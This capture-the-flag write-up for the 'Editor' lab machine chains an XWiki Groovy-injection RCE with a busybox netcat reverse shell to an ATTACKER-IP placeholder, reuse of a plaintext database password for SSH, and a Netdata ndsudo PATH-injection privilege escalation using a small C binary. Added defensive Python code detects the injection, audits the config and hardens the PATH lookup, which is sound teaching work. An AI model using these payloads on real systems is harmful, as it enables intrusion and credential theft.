Machine Info

Editor is an easy Linux box.

We add editor.htb to /etc/hosts.

User

Reconnaissance

We are going to start by running our nmap scan:

ports=$(nmap -p- --min-rate=1000 -T4 10.129.231.23 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)


└─$ nmap -p$ports -sC -sV 10.129.231.23
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-24 21:26 CET
Nmap scan report for editor.htb (10.129.231.23)
Host is up (0.054s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Editor - SimplistCode Pro
8080/tcp open  http    Jetty 10.0.20
| http-title: XWiki - Main - Intro
|_Requested resource was http://editor.htb:8080/xwiki/bin/view/Main/
|_http-server-header: Jetty(10.0.20)
| http-methods: 
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/ 
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/ 
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/ 
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/ 
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/ 
|_/xwiki/bin/undelete/
| http-cookie-flags: 
|   /: 
|     JSESSIONID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|   Server Type: Jetty(10.0.20)
|_  WebDAV type: Unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.80 seconds

XWiki CVE

We start some directory enumeration, but simply browsing the website shows that the interface links to wiki.editor.htb. After adding the subdomain to our hosts file we can see that wiki.editor.htb and editor.htb:8080 serve the same XWiki instance.

We immediately notice that the wiki exposes its version number.

Looking it up online we find a known RCE, CVE-2025-24893, with a public exploit available here. We download it and run it.

└─$ python CVE-2025-24893.py -t http://editor.htb:8080 -c 'busybox nc ATTACKER-IP 1234 -e /bin/bash'
[*] Attacking http://editor.htb:8080
[*] Injecting the payload:
http://editor.htb:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%20ATTACKER-IP%201234%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D                                               
[*] Command executed

~Happy Hacking
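From the defender's side, the request above is visible in the web server's access log: the payload travels in the SolrSearch text parameter as URL-encoded XWiki macro syntax. The following Python is added here and is not part of the original writeup or the exploit script; it URL-decodes that parameter and flags requests carrying script macros. The log lines are constructed, and the macro names beyond groovy and async are assumed extras.

```python
"""Flag XWiki SolrSearch requests whose 'text' parameter carries script macros
(the CVE-2025-24893 injection pattern). Detection only; runs offline."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx access-log lines (combined format), not captured from the box.
# The first one mirrors the exploit's request shape with a harmless 'id' command.
SAMPLE_LOG = """\
10.10.14.91 - - [24/Jan/2026:21:40:12 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22id%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D HTTP/1.1" 200 512 "-" "python-requests/2.32"
10.10.14.5 - - [24/Jan/2026:21:41:03 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release%20notes HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.5 - - [24/Jan/2026:21:41:10 +0100] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# {{groovy}} and {{async}} are the macros used in the writeup; velocity/python/script
# are assumed additional script macros worth flagging.
MACRO_RE = re.compile(r"\{\{\s*(groovy|async|velocity|python|script)\b", re.IGNORECASE)


def decode_text_param(target):
    """Return the decoded value(s) of the 'text' query parameter of a request target."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("text", [])
    # parse_qs decodes once; a second unquote also catches double-encoded payloads
    return [unquote(v) for v in values]


def scan_log(text):
    """Return (ip, timestamp, decoded_text) for every suspicious SolrSearch request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not urlsplit(m.group("target")).path.endswith("/bin/get/Main/SolrSearch"):
            continue
        for value in decode_text_param(m.group("target")):
            # a leading '}}' closes the search macro early, the hallmark of this injection
            if MACRO_RE.search(value) or value.lstrip().startswith("}}"):
                hits.append((m.group("ip"), m.group("ts"), value))
    return hits


if __name__ == "__main__":
    for ip, ts, payload in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} macro injection via SolrSearch text: {payload[:70]}")
```

Because the box fronts XWiki with nginx on port 80, the same check applies to the proxy's access log as well as Jetty's request log on 8080.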

We have a shell!

└─$ rlwrap nc -lnvp 1234 
listening on [any] 1234 ...
connect to [10.10.14.91] from (UNKNOWN) [10.129.231.23] 43118
python3 -c 'import pty;pty.spawn("/bin/bash");'
xwiki@editor:/usr/lib/xwiki-jetty$
Tip
Upgrade your shell with python3 -c 'import pty;pty.spawn("/bin/bash");'!

Secret Re-use

We start looking through the files on the server, and it is chaos. We are looking for secrets and passwords that we can reuse; we also note the user oliver.

Looking at the listening ports we see a few interesting ones.

ss -tlnp
State    Recv-Q    Send-Q            Local Address:Port        Peer Address:Port   Process   
LISTEN   0         4096                  127.0.0.1:36919            0.0.0.0:*                
LISTEN   0         70                    127.0.0.1:33060            0.0.0.0:*                
LISTEN   0         4096                  127.0.0.1:19999            0.0.0.0:*                
LISTEN   0         128                     0.0.0.0:22               0.0.0.0:*                
LISTEN   0         511                     0.0.0.0:80               0.0.0.0:*                
LISTEN   0         4096                  127.0.0.1:8125             0.0.0.0:*                
LISTEN   0         4096              127.0.0.53%lo:53               0.0.0.0:*                
LISTEN   0         151                   127.0.0.1:3306             0.0.0.0:*                
LISTEN   0         50                            *:8080                   *:*                
LISTEN   0         128                        [::]:22                  [::]:*                
LISTEN   0         511                        [::]:80                  [::]:*                
LISTEN   0         50           [::ffff:127.0.0.1]:8079                   *:*        

There is a MySQL service running, and we also see two other interesting ports, 19999 and 8125. Looking them up online, 19999 belongs to a monitoring service named Netdata.

We run a few searches to find a password, starting with MySQL.

xwiki@editor:/usr/lib/xwiki-jetty$ grep -R "jdbc:mysql" ./ 
grep -R "jdbc:mysql" ./ 
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&amp;connectionTimeZone=LOCAL&amp;allowPublicKeyRetrieval=true</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false</property>

Looking at hibernate.cfg.xml we see that it configures credentials for several database types. The MySQL block shown here holds the default credentials, which do not work when we check them.

<!-- MySQL configuration.
         Uncomment if you want to use MySQL and comment out other database configurations.
         Notes:
           - if you want the main wiki database to be different than "xwiki"
             you will also have to set the property xwiki.db in xwiki.cfg file
           - if you're using a MySQL 8+ JDBC driver, you don't need the "hibernate.connection.driver_class" which will
             generate a warning since it's not needed as the driver is registered automatically

    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
    <property name="hibernate.dbcp.poolPreparedStatements">true</property>
    <property name="hibernate.dbcp.maxOpenPreparedStatements">20</property>

    <property name="hibernate.connection.charSet">UTF-8</property>
    <property name="hibernate.connection.useUnicode">true</property>
    <property name="hibernate.connection.characterEncoding">utf8</property>

    <mapping resource="xwiki.hbm.xml"/>
    <mapping resource="feeds.hbm.xml"/>
    <mapping resource="instance.hbm.xml"/>
    <mapping resource="notification-filter-preferences.hbm.xml"/>
    <mapping resource="mailsender.hbm.xml"/>

We suspect, though, that the production credentials are set elsewhere, possibly in another file, and we note that the property holding the password is hibernate.connection.password. So we search for that instead.

User pass
xwiki@editor:/usr/lib/xwiki-jetty$ grep -R "hibernate.connection.password" ./
grep -R "hibernate.connection.password" ./
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password"></property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password">xwiki</property>
./webapps/xwiki/WEB-INF/hibernate.cfg.xml:    <property name="hibernate.connection.password"></property>

The password was in the same file, a few lines above the template block we looked at... It turns out to be oliver's user password as well, so the same secret is reused for the database and the account.
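Why grep returned seven password lines for a single live database: hibernate.cfg.xml keeps the other drivers' templates inside XML comments, which grep matches but the configuration parser never reads. The following Python is added here and is not from the writeup; it compares a grep-style search with what the XML parser actually honours and flags default, empty or plaintext live DB passwords. The config fragment is constructed to mirror the file's layout, with a placeholder password.

```python
"""Audit hibernate.cfg.xml: which DB credentials are live vs. commented-out
templates that a recursive grep also reports."""
import re
import xml.etree.ElementTree as ET

# Constructed fragment modelled on the real file's layout; the live password
# is a placeholder, not the value found on the box.
SAMPLE_CFG = """<hibernate-configuration>
  <session-factory>
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&amp;allowPublicKeyRetrieval=true</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">PLACEHOLDER_PASSWORD</property>
    <!-- MySQL template kept from the distribution, not active
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">xwiki</property>
    -->
    <!-- HSQLDB template, also inactive
    <property name="hibernate.connection.username">sa</property>
    <property name="hibernate.connection.password"></property>
    -->
  </session-factory>
</hibernate-configuration>
"""

PASSWORD_RE = re.compile(r'name="hibernate\.connection\.password">([^<]*)<')
TEMPLATE_DEFAULTS = {"xwiki", ""}  # values shipped in the stock templates

def grep_passwords(xml_text):
    """What `grep -R hibernate.connection.password` sees: live and commented-out alike."""
    return PASSWORD_RE.findall(xml_text)

def live_properties(xml_text):
    """The property map Hibernate actually loads; the XML parser skips comments."""
    root = ET.fromstring(xml_text)
    return {p.get("name"): (p.text or "") for p in root.iter("property")}

def audit(xml_text):
    """Summarise the live DB credential and what a config reviewer should report."""
    props = live_properties(xml_text)
    pw = props.get("hibernate.connection.password", "")
    return {
        "url": props.get("hibernate.connection.url"),
        "username": props.get("hibernate.connection.username"),
        "default_or_empty": pw in TEMPLATE_DEFAULTS,
        # a real value here is a plaintext secret readable by the app user's shell
        "plaintext_secret": pw not in TEMPLATE_DEFAULTS,
        "template_mentions": len(grep_passwords(xml_text)) - 1,
    }
```

The plaintext_secret finding is the one that matters for this box: anyone who gets a shell as the xwiki service user can read the live DB password, so it must never double as an interactive account's password.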


Root

Netdata

We have already seen an interesting service running, but first we run linpeas to list all possible attack vectors.

...
User & Groups: uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)
Hostname: editor
...

╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                                                                                           
-rwsr-x--- 1 root netdata 943K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!)                                                              
-rwsr-x--- 1 root netdata 1.4M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin (Unknown SUID binary!)                                                       
-rwsr-x--- 1 root netdata 1.1M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners (Unknown SUID binary!)                                                             
-rwsr-x--- 1 root netdata 196K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!)                                                                      
-rwsr-x--- 1 root netdata 80K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping (Unknown SUID binary!)                                                                       
-rwsr-x--- 1 root netdata 876K Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin (Unknown SUID binary!)                                                               
-rwsr-x--- 1 root netdata 4.1M Apr  1  2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin (Unknown SUID binary!)

This is interesting: there are more SUID binaries than usual, all belonging to the Netdata installation, and they are executable by the netdata group, of which oliver is a member. Let's forward the port and look at the service ourselves.

└─$ ssh [email protected]  -L 127.0.0.1:19999:127.0.0.1:19999

We spot the problem right away. Looking it up online we find CVE-2024-32019.

Path Injection - CVE-2024-32019

ndsudo is a SUID root helper that looks up the command it runs (here nvme) through the caller's PATH. To exploit this, we put a directory we control at the front of PATH and place a malicious binary under that command name, so that it runs as root and gives us a root shell or whatever else we want to achieve.

mkdir /home/oliver/topath
export PATH="/home/oliver/topath:$PATH"

Now, if we copy bash into that folder as nvme, ndsudo will execute it with its SUID privileges.

oliver@editor:~/topath$ cp /bin/bash ./nvme
oliver@editor:~/topath$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list 
/home/oliver/topath/nvme: list: No such file or directory

The problem is that ndsudo appends the list argument, so bash tries to open it as a script file. We tried a few other quick wins, but they failed too.

oliver@editor:~/topath$ echo "/bin/bash" > nvme 
oliver@editor:~/topath$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list 
execve: Exec format error

So we have to compile a small C binary that ignores its arguments and runs what we want as root, either to grab the flag or to spawn a reverse shell. We build the executable on our attacker machine.

└─$ cat exp.c 
#include <stdlib.h>
#include <unistd.h>

/* ndsudo execs this as "nvme list" with an effective uid of 0; the
   arguments are ignored and the real/saved ids are raised to root. */
int main(void) {
    setuid(0);
    setgid(0);
    system("cat /root/root.txt");
    return 0;
}


└─$ gcc exp.c -o exp

Uploading that as nvme into the topath folder and running the ndsudo command again gives us the root flag!
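The root cause is that the SUID helper resolved nvme through the caller's PATH. As an added illustration (not code from Netdata or from the writeup), the Python below contrasts that lookup with a hardened resolver that ignores the environment, accepts candidates only from fixed absolute directories and refuses group- or world-writable ones. The directory layout is constructed in a temporary tree, and the "trusted" directory is an assumption standing in for a real system path.

```python
"""Unsafe (PATH-based) vs hardened resolution of the helper a SUID wrapper such
as ndsudo executes; the difference is the core of CVE-2024-32019."""
import os
import shutil
import stat
import tempfile

def resolve_unsafe(name, path_env):
    """Vulnerable pattern: first match on the caller-controlled PATH wins."""
    return shutil.which(name, path=path_env)

def resolve_hardened(name, trusted_dirs):
    """Ignore the environment: fixed absolute directories only, and refuse a
    candidate (or its directory) that group or world can write to."""
    for d in trusted_dirs:
        if not os.path.isabs(d):
            raise ValueError(f"trusted dir must be absolute: {d}")
        candidate = os.path.join(d, name)
        if not os.path.isfile(candidate):
            continue
        mode = os.stat(candidate).st_mode | os.stat(d).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            raise PermissionError(f"{candidate}: group/world writable, refusing")
        return candidate
    raise FileNotFoundError(f"{name} not found in trusted directories")

def demo():
    """Constructed tree: a 'system' dir with the real nvme and a user dir prepended
    to PATH as the writeup did; returns what each resolver picks."""
    with tempfile.TemporaryDirectory() as root:
        sysdir = os.path.join(root, "usr", "sbin")
        userdir = os.path.join(root, "home", "oliver", "topath")
        for d in (sysdir, userdir):
            os.makedirs(d)
            os.chmod(d, 0o755)
            helper = os.path.join(d, "nvme")
            with open(helper, "w") as f:
                f.write("#!/bin/sh\nexit 0\n")
            os.chmod(helper, 0o755)
        path_env = userdir + os.pathsep + sysdir  # effect of export PATH="~/topath:$PATH"
        return {
            "unsafe": resolve_unsafe("nvme", path_env),
            "hardened": resolve_hardened("nvme", [sysdir]),
            "userdir": userdir,
            "sysdir": sysdir,
        }

if __name__ == "__main__":
    print(demo())
```

The same two rules (absolute paths, no trust in PATH or other inherited environment) are what any SUID or sudo-style helper should apply before exec'ing a subcommand.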